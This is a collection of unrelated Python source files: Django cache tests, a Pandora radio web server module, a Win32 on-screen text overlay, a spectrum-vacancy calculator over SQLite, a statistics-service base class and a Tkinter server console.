'58a0a05c8a5620f813686ff969c26853.d41d8cd98f00b204e9800998ecf8427e'
)
# Verify that a specified key_prefix is taken into account.
learn_cache_key(request, response, key_prefix=key_prefix)
self.assertEqual(
get_cache_key(request, key_prefix=key_prefix),
'views.decorators.cache.cache_page.localprefix.GET.'
'58a0a05c8a5620f813686ff969c26853.d41d8cd98f00b204e9800998ecf8427e'
)
def test_get_cache_key_with_query(self):
request = self.factory.get(self.path, {'test': 1})
template = engines['django'].from_string("This is a test")
response = TemplateResponse(HttpRequest(), template)
# Expect None if no headers have been set yet.
self.assertIsNone(get_cache_key(request))
# Set headers to an empty list.
learn_cache_key(request, response)
# Verify that the querystring is taken into account.
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'0f1c2d56633c943073c4569d9a9502fe.d41d8cd98f00b204e9800998ecf8427e'
)
@override_settings(USE_ETAGS=False)
def test_without_etag(self):
template = engines['django'].from_string("This is a test")
response = TemplateResponse(HttpRequest(), template)
self.assertFalse(response.has_header('ETag'))
patch_response_headers(response)
self.assertFalse(response.has_header('ETag'))
response = response.render()
self.assertFalse(response.has_header('ETag'))
@override_settings(USE_ETAGS=True)
def test_with_etag(self):
template = engines['django'].from_string("This is a test")
response = TemplateResponse(HttpRequest(), template)
self.assertFalse(response.has_header('ETag'))
patch_response_headers(response)
self.assertFalse(response.has_header('ETag'))
response = response.render()
self.assertTrue(response.has_header('ETag'))
class TestMakeTemplateFragmentKey(TestCase):
def test_without_vary_on(self):
key = make_template_fragment_key('a.fragment')
self.assertEqual(key, 'template.cache.a.fragment.d41d8cd98f00b204e9800998ecf8427e')
def test_with_one_vary_on(self):
key = make_template_fragment_key('foo', ['abc'])
self.assertEqual(key,
'template.cache.foo.900150983cd24fb0d6963f7d28e17f72')
def test_with_many_vary_on(self):
key = make_template_fragment_key('bar', ['abc', 'def'])
self.assertEqual(key,
'template.cache.bar.4b35f12ab03cec09beec4c21b2d2fa88')
def test_proper_escaping(self):
key = make_template_fragment_key('spam', ['abc:def%'])
self.assertEqual(key,
'template.cache.spam.f27688177baec990cdf3fbd9d9c3f469')
class CacheHandlerTest(TestCase):
def test_same_instance(self):
"""
Attempting to retrieve the same alias should yield the same instance.
"""
cache1 = caches['default']
cache2 = caches['default']
self.assertIs(cache1, cache2)
def test_per_thread(self):
"""
Requesting the same alias from separate threads should yield separate
instances.
"""
c = []
def runner():
c.append(caches['default'])
for x in range(2):
t = threading.Thread(target=runner)
t.start()
t.join()
self.assertIsNot(c[0], c[1])
|
__init__.py
|
# -*- coding: utf-8 -*-
"""Radio module"""
import sys
import os
import subprocess
import threading
from radioLib import wsgiserver
from Radio import app
import logger
from pithos import pithos
from apscheduler.scheduler import Scheduler
FULL_PATH = None
RUNDIR = None
ARGS = None
DAEMON = False
PIDFILE = None
VERBOSE = True
LOG_FILE = None
LOG_LIST = []
PORT = None
DATABASE = None
INIT_LOCK = threading.Lock()
__INITIALIZED__ = False
DEVELOPMENT = False
WEBROOT = ''
radiologger = None
pandoraplayer = None
SERVER = None
HOST = '0.0.0.0'
KIOSK = False
DATA_DIR = None
SCRIPT_DIR = None
THREADS = []
SCHEDULE = Scheduler()
UPDATER = True
CURRENT_COMMIT = None
LATEST_COMMIT = None
COMMITS_BEHIND = 0
COMMITS_COMPARE_URL = ''
FIRST_RUN = 0
def initialize():
"""Init function for this module"""
with INIT_LOCK:
global __INITIALIZED__, app, FULL_PATH, RUNDIR, ARGS, DAEMON, PIDFILE, VERBOSE, LOG_FILE, LOG_DIR, radiologger, PORT, SERVER, DATABASE, AUTH, \
UPDATER, CURRENT_COMMIT, LATEST_COMMIT, COMMITS_BEHIND, COMMITS_COMPARE_URL, USE_GIT, WEBROOT, HOST, KIOSK, DATA_DIR, SCRIPT_DIR, \
THREADS, FIRST_RUN, pandoraplayer
if __INITIALIZED__:
return False
# Set up logger
if not LOG_FILE:
LOG_FILE = os.path.join(DATA_DIR, 'logs', 'radio.log')
FILENAME = os.path.basename(LOG_FILE)
LOG_DIR = LOG_FILE[:-len(FILENAME)]
if not os.path.exists(LOG_DIR):
try:
os.makedirs(LOG_DIR)
except OSError:
if VERBOSE:
print 'Unable to create the log directory.'
radiologger = logger.RadioLogger(LOG_FILE, VERBOSE)
#set up script dir
if not SCRIPT_DIR:
SCRIPT_DIR = os.path.join(RUNDIR, 'scripts')
if KIOSK:
radiologger.log('Running in KIOSK Mode, settings disabled.', 'INFO')
#Check if a version file exists. If not assume latest revision.
version_file = os.path.join(DATA_DIR, 'Version.txt')
if not os.path.exists(version_file):
FIRST_RUN = 1
# check if database exists or create it
try:
radiologger.log('Checking if PATH exists: %s' % (DATABASE), 'WARNING')
dbpath = os.path.dirname(DATABASE)
if not os.path.exists(dbpath):
try:
radiologger.log('It does not exist, creating it...', 'WARNING')
os.makedirs(dbpath)
except:
radiologger.log('Could not create %s.' % (DATABASE), 'CRITICAL')
print 'Could not create %s.' % (DATABASE)
quit()
except:
radiologger.log('Could not create %s.' % (DATABASE), 'CRITICAL')
quit()
radiologger.log('Database successfully initialised', 'INFO')
# Web server settings
from radio.config import preferences
settings = preferences.Prefs()
get_setting_value = settings.getRadioSettingValue
if get_setting_value('port'):
port_arg = False
for arg in ARGS:
if arg == '--port' or arg == '-p':
port_arg = True
if not port_arg:
PORT = int(get_setting_value('port'))
# Set up web server
if '--webroot' not in str(ARGS):
WEBROOT = get_setting_value('webroot')
if WEBROOT is None or DEVELOPMENT:
WEBROOT = ''
if WEBROOT:
if WEBROOT[0] != '/':
WEBROOT = '/' + WEBROOT
d = wsgiserver.WSGIPathInfoDispatcher({WEBROOT: app})
else:
d = wsgiserver.WSGIPathInfoDispatcher({'/': app})
SERVER = wsgiserver.CherryPyWSGIServer((HOST, PORT), d)
# Start Pandora
pandoraplayer = pithos.Pithos(radiologger)
__INITIALIZED__ = True
return True
def init_updater():
from radio.updater import checkGithub, gitCurrentVersion
global USE_GIT, CURRENT_COMMIT, COMMITS_BEHIND
if UPDATER:
if os.name == 'nt':
USE_GIT = False
else:
USE_GIT = os.path.isdir(os.path.join(RUNDIR, '.git'))
if USE_GIT:
gitCurrentVersion()
version_file = os.path.join(DATA_DIR, 'Version.txt')
if os.path.isfile(version_file):
f = open(version_file, 'r')
CURRENT_COMMIT = f.read()
f.close()
else:
COMMITS_BEHIND = -1
threading.Thread(target=checkGithub).start()
def start_schedules():
"""Add all periodic jobs to the scheduler"""
if UPDATER:
# check every 6 hours for a new version
from radio.updater import checkGithub
SCHEDULE.add_interval_job(checkGithub, hours=6)
SCHEDULE.start()
def start():
"""Start the actual server"""
if __INITIALIZED__:
#start_schedules()
if not DEVELOPMENT:
try:
radiologger.log('Starting Radio on %s:%i%s' % (HOST, PORT, WEBROOT), 'INFO')
SERVER.start()
while not True:
pass
except KeyboardInterrupt:
stop()
else:
radiologger.log('Starting Radio development server on port: %i' % (PORT), 'INFO')
radiologger.log(' ##### IMPORTANT : WEBROOT DOES NOT WORK UNDER THE DEV SERVER #######', 'INFO')
app.run(debug=True, port=PORT, host=HOST)
def stop():
"""Shutdown Radio"""
radiologger.log('Shutting down Radio...', 'INFO')
if not DEVELOPMENT:
SERVER.stop()
else:
from flask import request
func = request.environ.get('werkzeug.server.shutdown')
if func is None:
raise RuntimeError('Not running with the Werkzeug Server')
func()
SCHEDULE.shutdown(wait=False)
if PIDFILE:
radiologger.log('Removing pidfile: %s' % str(PIDFILE), 'INFO')
os.remove(PIDFILE)
def restart():
"""Restart Radio"""
SERVER.stop()
popen_list = [sys.executable, FULL_PATH]
popen_list += ARGS
radiologger.log('Restarting Radio with: %s' % popen_list, 'INFO')
SCHEDULE.shutdown(wait=False)
subprocess.Popen(popen_list, cwd=RUNDIR)
def daemonize():
"""Start Radio as a daemon"""
if threading.activeCount() != 1:
radiologger.log('There are %s active threads. Daemonizing may cause strange behavior.' % threading.activeCount(), 'WARNING')
sys.stdout.flush()
sys.stderr.flush()
try:
pid = os.fork()
if pid == 0:
pass
else:
radiologger.log('Forking once...', 'DEBUG')
os._exit(0)
except OSError, e:
sys.exit('1st fork failed: %s [%d]' % (e.strerror, e.errno))
os.chdir('/')
os.umask(0)
os.setsid()
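    # Second fork: after setsid() this process is a session leader; forking again
    # ensures the daemon can never reacquire a controlling terminal.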
try:
pid = os.fork()
if pid > 0:
radiologger.log('Forking twice...', 'DEBUG')
os._exit(0)
except OSError, e:
sys.exit('2nd fork failed: %s [%d]' % (e.strerror, e.errno))
pid = os.getpid()
radiologger.log('Daemonized to PID: %s' % pid, 'INFO')
if PIDFILE:
radiologger.log('Writing PID %s to %s' % (pid, PIDFILE), 'INFO')
file(PIDFILE, 'w').write("%s\n" % pid)
@app.context_processor
def utility_processor():
def webroot_url(url=''):
return WEBROOT + url
return dict(webroot_url=webroot_url)
|
tos.py
|
import sys, os, time
rootPath = os.path.dirname(os.path.realpath(__file__))
sys.path.append(os.path.split(os.path.split(rootPath)[0])[0])
import RTool.util.importer as imp
exec(imp.ImportHandler(
["win32api", "win32con", "win32gui", "win32ui"]))
#import win32api, win32con, win32gui, win32ui
from threading import Thread
class TextWindow:
global ref
ref = []
def __init__(self, text):
self.text = text
self.hInstance = None
self.hWindow = None
self.wndClassAtom = None
t = Thread(target=self.Tmain)
t.start()
#self.Tmain()
def delete(self):
try:
if self.hWindow != None:
win32gui.PostMessage(self.hWindow, win32con.WM_DESTROY, 0, 0)
time.sleep(0.1) # wait for window to close
win32gui.UnregisterClass(self.wndClassAtom, self.hInstance)
ref.remove(self)
print("Deleted",self.text)
else:
print("No hWindow:",self.text)
del self
except:
e = sys.exc_info()[0]
print( "<p>Error: %s</p>" % e )
def refCheck(self):
self.deleteAll()
ref.append(self)
@staticmethod
def deleteAll():
if ref != []:
for i in ref:
i.delete()
def Tmain(self):
self.refCheck()
self.hInstance = win32api.GetModuleHandle()
className = 'MyWindowClassName'
# http://msdn.microsoft.com/en-us/library/windows/desktop/ms633576(v=vs.85).aspx
# win32gui does not support WNDCLASSEX.
wndClass = win32gui.WNDCLASS()
# http://msdn.microsoft.com/en-us/library/windows/desktop/ff729176(v=vs.85).aspx
wndClass.style = win32con.CS_HREDRAW | win32con.CS_VREDRAW
wndClass.lpfnWndProc = self.wndProc
wndClass.hInstance = self.hInstance
wndClass.hCursor = win32gui.LoadCursor(None, win32con.IDC_ARROW)
wndClass.hbrBackground = win32gui.GetStockObject(win32con.WHITE_BRUSH)
wndClass.lpszClassName = className
# win32gui does not support RegisterClassEx
self.wndClassAtom = win32gui.RegisterClass(wndClass)
# http://msdn.microsoft.com/en-us/library/windows/desktop/ff700543(v=vs.85).aspx
# Consider using: WS_EX_COMPOSITED, WS_EX_LAYERED, WS_EX_NOACTIVATE, WS_EX_TOOLWINDOW, WS_EX_TOPMOST, WS_EX_TRANSPARENT
# The WS_EX_TRANSPARENT flag makes events (like mouse clicks) fall through the window.
exStyle = win32con.WS_EX_COMPOSITED | win32con.WS_EX_LAYERED | win32con.WS_EX_NOACTIVATE | win32con.WS_EX_TOPMOST | win32con.WS_EX_TRANSPARENT
# http://msdn.microsoft.com/en-us/library/windows/desktop/ms632600(v=vs.85).aspx
# Consider using: WS_DISABLED, WS_POPUP, WS_VISIBLE
style = win32con.WS_DISABLED | win32con.WS_POPUP | win32con.WS_VISIBLE
# http://msdn.microsoft.com/en-us/library/windows/desktop/ms632680(v=vs.85).aspx
self.hWindow = win32gui.CreateWindowEx(
exStyle,
self.wndClassAtom,
None, # WindowName
style,
0, # x
0, # y
win32api.GetSystemMetrics(win32con.SM_CXSCREEN), # width
win32api.GetSystemMetrics(win32con.SM_CYSCREEN), # height
None, # hWndParent
None, # hMenu
self.hInstance,
None # lpParam
)
# http://msdn.microsoft.com/en-us/library/windows/desktop/ms633540(v=vs.85).aspx
win32gui.SetLayeredWindowAttributes(self.hWindow, 0x00ffffff, 255, win32con.LWA_COLORKEY | win32con.LWA_ALPHA)
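        # With LWA_COLORKEY, pixels matching the colour key 0x00ffffff (white) are
        # rendered fully transparent; since the window background brush is
        # WHITE_BRUSH, only the drawn text remains visible on screen.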
# http://msdn.microsoft.com/en-us/library/windows/desktop/dd145167(v=vs.85).aspx
#win32gui.UpdateWindow(hWindow)
# http://msdn.microsoft.com/en-us/library/windows/desktop/ms633545(v=vs.85).aspx
win32gui.SetWindowPos(self.hWindow, win32con.HWND_TOPMOST, 0, 0, 0, 0,
win32con.SWP_NOACTIVATE | win32con.SWP_NOMOVE | win32con.SWP_NOSIZE | win32con.SWP_SHOWWINDOW)
# http://msdn.microsoft.com/en-us/library/windows/desktop/ms633548(v=vs.85).aspx
#win32gui.ShowWindow(self.hWindow, win32con.SW_SHOW)
win32gui.PumpMessages()
#print("PumpMessages is off")
def wndProc(self, hWnd, message, wParam, lParam):
if message == win32con.WM_PAINT:
hdc, paintStruct = win32gui.BeginPaint(hWnd)
dpiScale = win32ui.GetDeviceCaps(hdc, win32con.LOGPIXELSX) / 60.0
fontSize = 80
# http://msdn.microsoft.com/en-us/library/windows/desktop/dd145037(v=vs.85).aspx
lf = win32gui.LOGFONT()
lf.lfFaceName = "Times New Roman"
lf.lfHeight = int(round(dpiScale * fontSize))
#lf.lfWeight = 150
# Use nonantialiased to remove the white edges around the text.
# lf.lfQuality = win32con.NONANTIALIASED_QUALITY
hf = win32gui.CreateFontIndirect(lf)
win32gui.SelectObject(hdc, hf)
rect = win32gui.GetClientRect(hWnd)
# http://msdn.microsoft.com/en-us/library/windows/desktop/dd162498(v=vs.85).aspx
win32gui.DrawText(
hdc,
self.text,
-1,
rect,
win32con.DT_CENTER | win32con.DT_NOCLIP | win32con.DT_SINGLELINE | win32con.DT_VCENTER
)
win32gui.EndPaint(hWnd, paintStruct)
return 0
elif message == win32con.WM_DESTROY:
print('Closing the window.')
win32gui.PostQuitMessage(0)
return 0
else:
return win32gui.DefWindowProc(hWnd, message, wParam, lParam)
def main():
test = None
text = "What"
for i in range(10):
test = TextWindow(str(10-i))
#print(i)
time.sleep(1)
#test.delete()
TextWindow.deleteAll()
'''
test = TextOnScreen("Poop")
time.sleep(2)
print("?")
test.delete()
#del test
test2 = TextOnScreen("What?")
time.sleep(1)
test2.delete()
'''
if __name__ == '__main__':
main()
|
determine_vacant_spectrum.py
|
'''
Summary:
'''
import sqlite3
from sqlite3 import Error
#from interval import Interval, IntervalSet
import intervals as interval #requires: pip install python-intervals
import threading
import time
from time import gmtime, strftime
'''
Global constants
'''
#databases
spectrum_data_base = "openspectrum.db"
#database tables
spectrum_assignment_long_term = "freqAssignment" #occupied spectrum
spectrum_unassigned = "unassigned_freq" #vacant spectrum
spectrum_assignment_dynamic = "dynamic_freq_assignment" #dynamically assigned spectrum or short-term spectrum lease
spectrum_assignment_changes_flag = "flags" # contains binary values (0/1) to indicate whether or not there's been a change in frequency assignment
spectrum_operators = "operators"
spectrum_license = "spectrumLicense"
#frequency bands
nine_hundred_MHz_band_start = 880
nine_hundred_MHz_band_end = 960
eighteen_hundred_MHz_band_start = 1710
eighteen_hundred_MHz_band_end = 1880
twenty_one_hundred_MHz_band_start = 1920
twenty_one_hundred_MHz_band_end = 2170
twenty_six_hundred_MHz_band_start = 2500
twenty_six_hundred_MHz_band_end = 2690
"""
Attempting to combine the above frequency ranges into one list
"""
bands = [(nine_hundred_MHz_band_start, nine_hundred_MHz_band_end),
(eighteen_hundred_MHz_band_start, eighteen_hundred_MHz_band_end),
(twenty_one_hundred_MHz_band_start, twenty_one_hundred_MHz_band_end ),
(twenty_six_hundred_MHz_band_start, twenty_six_hundred_MHz_band_end)]
#Other
boundary = 1
spectrum_info_update_interval = 5 #in seconds
def spectrum_assignment_changes_monitor(conn):
'''
    Periodically check if there are any changes in frequency assignment
'''
while True:
#keep checking for changes in spectrum assignment
conn = create_connection(spectrum_data_base)
cur = conn.cursor()
sql = "SELECT fixed_frequency_assignment, dynamic_frequency_assignment FROM " + spectrum_assignment_changes_flag
cur.execute(sql)
val2 = cur.fetchone() #returns first row, which is all there is
print strftime("%Y-%m-%d %H:%M:%S", gmtime()), 'Flag status:', val2[0], val2[1]
#print 'Flag status:', val2[0], val2[1]
if (val2[0] == 1 or val2[1] == 1):
print 'Refreshing unassigned frequency'
            #recalculate vacant spectrum
vacant_spectrum_finder(conn)
time.sleep (spectrum_info_update_interval)
def create_connection(db_file):
""" create a database connection to the SQLite database
specified by the db_file
:param db_file: database file
:return: Connection object or None
"""
try:
conn = sqlite3.connect(db_file)
return conn
except Error as e:
print(e)
return None
def vacant_spectrum_finder(conn):
'''
-Let A be total spectrum in a given frequency band.
-Let B be assigned frequencies (nationally and long term).
-Unassigned frequencies C = A - B
-Further let D be dynamic and possibly short term frequency assignments
-Vacant spectrum C' = C - D
----------------------------------------------------
'''
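    # Illustrative sketch of the interval arithmetic above using python-intervals
    # (hypothetical numbers, not taken from the database):
    #   A = interval.closed(880, 960)    # total band
    #   B = interval.closed(890, 915)    # one assigned block
    #   A - B                            # -> [880,890) | (915,960], i.e. C = A - B
    # The loops below repeat this subtraction for every assigned row.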
'''
start by erasing previous records of unassigned spectrum
'''
sql = 'DELETE FROM '+spectrum_unassigned
cur = conn.cursor()
cur.execute(sql) #delete all previous table contents
'''
fetch statically assigned frequencies
'''
cur = conn.cursor()
# do a table join and use the country ID for Mozambique
#based on database schema: https://dbdiagram.io/d/5c719df7f7c5bb70c72f1a9a
sql = 'SELECT freqStart, freqEnd FROM '+spectrum_assignment_long_term+ \
' INNER JOIN spectrumLicense ON freqAssignment.license_ID = spectrumLicense.ID \
INNER JOIN '+ spectrum_operators +' ON ' +spectrum_operators+'.ID = '+ spectrum_license +'.Operator_ID \
WHERE ' +spectrum_operators+'.country_ID = 152'
cur.execute(sql)
static_frequency_assignment = cur.fetchall()
'''
fetch dynamic frequency assignment
'''
cur = conn.cursor()
sql = 'SELECT * FROM '+spectrum_assignment_dynamic
cur.execute(sql)
dynamic_frequency_assignment = cur.fetchall()
'''
Specify total spectrum in terms of START and STOP frequency
'''
#r = interval.closed(nine_hundred_MHz_band_start, nine_hundred_MHz_band_end) #900 MHz band
#r = interval.closed(eighteen_hundred_MHz_band_start, eighteen_hundred_MHz_band_end) #1800 MHz band
#r = interval.closed(twenty_one_hundred_MHz_band_start, twenty_one_hundred_MHz_band_end) #2100 MHz band
#r = interval.closed(twenty_six_hundred_MHz_band_start, twenty_six_hundred_MHz_band_end) #2600 MHz band
'''
    Subtract assigned frequencies (long term) from the total frequency range, i.e. A - B
'''
for band in bands:
r = interval.closed(band[0], band[1])
for row in static_frequency_assignment:
#cur.execute(sql + str(row))
#vacant_spectrum.append(row)
'''
The logic "interval.closed(row[x], row[y])" denotes start and end points of a range.
'x' and 'y' are the columns in the table.
            For example, since we only selected `freqStart` and `freqEnd` from the database, the values are in columns 0 and 1.
'''
            r1 = interval.closed(row[0]-boundary, row[1]+boundary) # -,+ 'boundary' ensures overlapping bounds are excluded
temp = r - r1
r = temp
'''
        Subtract dynamically assigned frequencies, i.e. C - D
'''
for row in dynamic_frequency_assignment:
r1 = interval.closed(row[2]-boundary, row[3]+boundary)
temp = r - r1
r = temp
vacant_spectrum = [] #list of rows
vacant_spectrum = temp
'''
Save the newly calculated unoccupied frequencies to database if vacant_spectrum != empty
'''
freq_band = ""
if (check_if_list_empty(temp)==True ): #needs fixing, currently breaks when list is empty [4 July 2019]
print 'No vacant spectrum found'
else:
cur = conn.cursor()
for item in vacant_spectrum:
'''
Determine frequency band
'''
if item in interval.closed(nine_hundred_MHz_band_start, nine_hundred_MHz_band_end):
freq_band = "900"
elif item in interval.closed(eighteen_hundred_MHz_band_start, eighteen_hundred_MHz_band_end):
freq_band = "1800"
elif item in interval.closed(twenty_one_hundred_MHz_band_start, twenty_one_hundred_MHz_band_end):
freq_band = "2100"
elif item in interval.closed(twenty_six_hundred_MHz_band_start, twenty_six_hundred_MHz_band_end):
freq_band = "2600"
#The ID field is set to auto-increment and is also the primary key
sql = 'INSERT INTO '+spectrum_unassigned+' (freqStart, freqEnd, band) VALUES (' + str(item).strip("( ) []")+ ','+freq_band +')' #strip off the brackets if any
cur.execute(sql)
print (temp)
'''
Reset the flags
'''
cur = conn.cursor()
sql = 'UPDATE '+spectrum_assignment_changes_flag + ' SET fixed_frequency_assignment = 0, dynamic_frequency_assignment = 0'
cur.execute(sql)
conn.commit() #commit changes
return None
def check_if_list_empty(seq):
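    # Returns True for an empty sequence or a sequence containing only (nested)
    # empty sequences; non-iterable values raise TypeError and are treated as
    # "not empty".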
try:
return all(map(check_if_list_empty, seq))
except TypeError:
return False
def main():
conn = create_connection(spectrum_data_base) #create a database connection
with conn:
print("Attempting to find unassigned spectrum:")
'''
Initial calculation of unassigned frequencies
'''
vacant_spectrum_finder(conn)
'''
Monitor frequency assignment status
'''
threading.Thread(target = spectrum_assignment_changes_monitor, args =(conn,)).start()
if __name__ == '__main__':
main()
|
statistics_service.py
|
import time
import traceback
import dataclasses
from dataclasses import dataclass
from abc import ABCMeta, abstractmethod
from collections import deque
from datetime import datetime
from threading import Thread, Lock
from typing import Optional, TypeVar, Generic, Deque, Type, Callable, Dict, Any, TYPE_CHECKING
from bxcommon import constants
from bxutils import log_messages
from bxutils import logging
from bxutils.logging import CustomLogger
from bxutils.logging.log_level import LogLevel
from bxutils.logging.log_record_type import LogRecordType
logger = logging.get_logger(__name__)
task_duration_logger = logging.get_logger(LogRecordType.TaskDuration, __name__)
if TYPE_CHECKING:
# pylint: disable=ungrouped-imports,cyclic-import
from bxcommon.connections.abstract_node import AbstractNode
@dataclass
class StatsIntervalData:
start_time: datetime = dataclasses.field(default_factory=datetime.utcnow)
end_time: Optional[datetime] = None
_closed: bool = False
def close(self):
self.end_time = datetime.utcnow()
self._closed = True
T = TypeVar("T", bound=StatsIntervalData)
N = TypeVar("N", bound="AbstractNode")
class StatisticsService(Generic[T, N], metaclass=ABCMeta):
"""
Abstract class of statistics services.
"""
history: Deque[T]
node: Optional[N]
name: str
log_level: LogLevel
logger: CustomLogger
interval_data: T
interval: int
reset: bool
def __init__(
self,
name: str,
interval: int = 0,
look_back: int = 1,
reset: bool = False,
stat_logger: CustomLogger = logger,
log_level: LogLevel = LogLevel.STATS,
):
self.history = deque(maxlen=look_back)
self.node = None
self.name = name
self.log_level = log_level
self.logger = stat_logger
self.interval_data = self.get_interval_data_class()()
self.interval = interval
self.reset = reset
@abstractmethod
def get_interval_data_class(self) -> Type[T]:
pass
@abstractmethod
def get_info(self) -> Optional[Dict[str, Any]]:
"""
        Constructs the response object to be output at the stat service's configured interval.
:return: dictionary to be converted to JSON
"""
def set_node(self, node: N) -> None:
self.node = node
# reset the interval data
self.create_interval_data_object()
def create_interval_data_object(self) -> None:
self.interval_data = self.get_interval_data_class()()
def close_interval_data(self) -> None:
assert self.node is not None
assert self.interval_data is not None
self.interval_data.close()
self.history.append(self.interval_data)
# pylint: disable=unused-argument
def flush_info(self, threshold: int = 0) -> int:
self.close_interval_data()
data = self.get_info()
if data:
self.logger.log(self.log_level, {"data": data, "type": self.name})
# Start a new interval data if non cumulative
if self.reset:
self.create_interval_data_object()
return self.interval
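# A minimal sketch of a concrete subclass (hypothetical names, for illustration only):
#
#   @dataclass
#   class CounterIntervalData(StatsIntervalData):
#       events: int = 0
#
#   class CounterStatsService(StatisticsService[CounterIntervalData, "AbstractNode"]):
#       def get_interval_data_class(self) -> Type[CounterIntervalData]:
#           return CounterIntervalData
#
#       def get_info(self) -> Optional[Dict[str, Any]]:
#           return {"events": self.interval_data.events}
#
#   svc = CounterStatsService("counter_stats", interval=60, reset=True)
#
# flush_info() then closes the interval, logs {"data": ..., "type": self.name},
# and recreates the interval data because reset is True.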
class ThreadedStatisticsService(StatisticsService[T, N], metaclass=ABCMeta):
"""
Abstract class for stats service that may take a long time to execute.
"""
_thread: Optional[Thread]
_alive: bool
_lock: Lock
def __init__(self, name: str, *args, **kwargs) -> None:
super(ThreadedStatisticsService, self).__init__(name, *args, **kwargs)
self._thread = None
self._alive = True
self._lock = Lock()
def start_recording(self, record_fn: Callable) -> None:
self._thread = Thread(target=self.loop_record_on_thread, args=(record_fn,))
# pyre-fixme[16]: `Optional` has no attribute `start`.
self._thread.start()
def stop_recording(self) -> None:
# TODO: This is necessary in order to make the tests pass. We are initializing multiple
# nodes in a process in a test, both of which are initializing the memory_statistics_service.
# Thus, there is unclear ownership of the global variable. The right fix here is to make
# memory_statistics_service not a singleton anymore and have it be a variable that is assigned
# on a per-node basis.
if self._thread is None:
self.logger.error(log_messages.STOP_RECORDING_CALLED_ON_UNINITIALIZED_THREAD)
return
with self._lock:
self._alive = False
# pyre-fixme[16]: `Optional` has no attribute `join`.
self._thread.join()
def sleep_and_check_alive(self, sleep_time: float) -> bool:
"""
Sleeps for sleep_time seconds and checks whether or not this service is alive every 30 seconds.
Returns whether or not this service is alive at the end of this sleep time.
"""
with self._lock:
alive = self._alive
while sleep_time > 0 and alive:
time.sleep(constants.THREADED_STATS_SLEEP_INTERVAL_S)
sleep_time -= constants.THREADED_STATS_SLEEP_INTERVAL_S
with self._lock:
alive = self._alive
time.sleep(0) # ensure sleep is called regardless of the sleep time value
return alive
def loop_record_on_thread(self, record_fn: Callable) -> None:
"""
Assume that record_fn is a read-only function and it's okay to get somewhat stale data.
"""
node = self.node
assert node is not None
# align all nodes to write statistics at the same time (clock interval)
next_clock_interval = ((int(time.time() / self.interval) + 1) * self.interval) - time.time()
alive = self.sleep_and_check_alive(next_clock_interval)
while alive:
start_date_time = datetime.utcnow()
start_time = time.time()
try:
record_fn()
# pylint: disable=broad-except
except Exception as e:
self.logger.error(
log_messages.FAILURE_RECORDING_STATS, self.name, e, traceback.format_exc()
)
else:
runtime = time.time() - start_time
task_duration_logger.statistics(
{
"type": "TaskDuration",
"start_date_time": start_date_time,
"task": self.name,
"duration": runtime,
"node_id": node.opts.node_id,
}
)
# align all nodes to write statistics at the same time (clock interval)
next_clock_sleep_time = ((int(time.time() / self.interval) + 1) * self.interval) - time.time()
alive = self.sleep_and_check_alive(next_clock_sleep_time)
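# Hedged sketch (illustrative names, not part of the bxcommon code base): a
# minimal concrete StatisticsService that counts events per interval. Driving
# code would bump `interval_data.events` and call `flush_info()` periodically.
@dataclass
class _CounterIntervalData(StatsIntervalData):
    events: int = 0


class _CounterStatisticsService(StatisticsService[_CounterIntervalData, "AbstractNode"]):
    def __init__(self) -> None:
        # Log every 60 seconds and reset the counter after each flush.
        super().__init__("counter_stats", interval=60, reset=True)

    def get_interval_data_class(self) -> Type[_CounterIntervalData]:
        return _CounterIntervalData

    def get_info(self) -> Optional[Dict[str, Any]]:
        # Snapshot of the counter accumulated during the current interval.
        return {"events": self.interval_data.events}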
|
servercmds.py
|
import tkinter as tk
import multiprocessing as mp
import threading
class ServerCommandLineUI:
def __init__(self, command_handler, pipe, frame = None, default_title = 'Server Command Line'):
self.command_handler = command_handler
self.pipe = pipe
self.frame = frame
self.default_title = default_title
self.quit = False
self.process_interface, process_interface = mp.Pipe()
mp.Process(target = _UI, args = [process_interface, None], name = 'Server command line UI process').start()
threading.Thread(target = self._receiver, name = 'Server UI comm receiver').start()
threading.Thread(target = self._server_receiver, name = 'Server UI server receiver').start()
self.set_title(self.default_title)
def _server_receiver(self):
while not self.quit:
input_data = self.pipe.recv()
self.process_interface.send(['push', input_data])
def _receiver(self):
command = ''
while (not command == 'quit') and (not self.quit):
input_data = self.process_interface.recv()
command = input_data[0]
args = input_data[1:]
if command == 'cmdout':
self.process_interface.send(['push', self.command_handler(args[0])])
self.quit = True
def set_title(self, title):
self.process_interface.send(['set title', title])
class _UI:
def __init__(self, process_interface, frame):
self.process_interface = process_interface
self.quit = False
if frame is None:
self.toplevel = tk.Tk()
else:
self.toplevel = frame
threading.Thread(target = self.receiver, name = 'Server UI process receiver').start()
## make ui
#command output box
self.output_frame = tk.Frame(self.toplevel)
self.output_listbox = tk.Listbox(self.output_frame, font = self.styling.fonts.small)
self.output_bar = tk.Scrollbar(self.output_frame, command = self.output_listbox.yview)
self.output_listbox.config(yscrollcommand = self.output_bar.set)
self.output_bar.pack(side = tk.RIGHT, fill = tk.Y)
self.output_listbox.pack(side = tk.LEFT, fill = tk.BOTH, expand = True)
#command entry field
self.cmd_var = tk.StringVar()
self.cmd_field = tk.Entry(self.toplevel, textvariable = self.cmd_var, font = self.styling.fonts.small)
self.cmd_button = tk.Button(self.toplevel, text = 'Submit', command = self.submit_command, font = self.styling.fonts.small, relief = self.styling.relief, overrelief = self.styling.overrelief)
if type(self.toplevel) == tk.Tk:
self.toplevel.bind('<Return>', self.submit_command)
else:
self.cmd_button.bind('<Return>', self.submit_command)
#grid items
self.output_frame.grid(column = 0, row = 0, columnspan = 2, sticky = 'NESW')
self.cmd_field.grid(column = 0, row = 1, sticky = 'NESW')
self.cmd_button.grid(column = 1, row = 1, sticky = 'NESW')
#set grid weights
self.toplevel.columnconfigure(0, weight = 1)
self.toplevel.rowconfigure(0, weight = 1)
## end of make ui
if self.toplevel is not None:
self.toplevel.geometry('400x300')
self.toplevel.mainloop()
self.on_quit()
def receiver(self):
while not self.quit:
input_data = self.process_interface.recv()
command = input_data[0]
args = input_data[1:]
if command == 'set title':
if type(self.toplevel) is tk.Tk:
self.toplevel.title(args[0])
elif command == 'quit':
self.on_quit()
elif command == 'push':
if type(args[0]) == str:
args[0] = args[0].split('\n')
for line in args[0]:
for line0 in line.split('\n'):
if line0.startswith('$$') and line0.endswith('$$') and len(line0) > 4: #console output operation
if line0[2:len(line0) - 2] == 'clear':
self.output_listbox.delete(0, tk.END)
elif line0[2:len(line0) - 2] == 'close_window':
self.on_quit()
else:
self.output_listbox.insert(tk.END, line0)
self.output_listbox.see(tk.END)
def on_quit(self):
self.quit = True
